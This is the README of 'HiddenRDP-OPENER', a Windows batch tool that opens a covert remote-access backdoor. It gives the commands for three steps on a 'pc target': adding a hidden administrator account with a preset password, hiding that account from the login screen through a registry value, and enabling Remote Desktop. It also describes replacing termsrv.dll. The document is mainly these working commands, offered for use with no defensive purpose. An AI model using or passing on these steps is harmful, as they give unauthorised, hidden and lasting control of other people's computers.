HiddenRDP-OPENER
This script make any windows compatible with RDP connection
Windows 7 , Windows 8 , Windows 10 / Not tested yet in Windows XP This script create a hidden profil ( Administrator privilege ) and change registry parametre to make windows compatible with RDP Connection.You need to open RDPScript.bat with your editor (in your pc)
And make this changes :
net user hidden 123123 /ADD
123123 = password of your account
change termsrv.dll with your full path (in pc target) , ex : C:\Users\comix\Downloads\termsrv.dll
move termsrv.dll,RDPScript.bat in the pc target Change this value in RDPScript.bat to delete the hidden profile from
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Hidden /t REG_DWORD /d 0X00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Hidden /t REG_DWORD /d 0X00000001 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0X00000000 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0X00000001 /f
Copyright © 2019 Soufiyan Ak (Comix)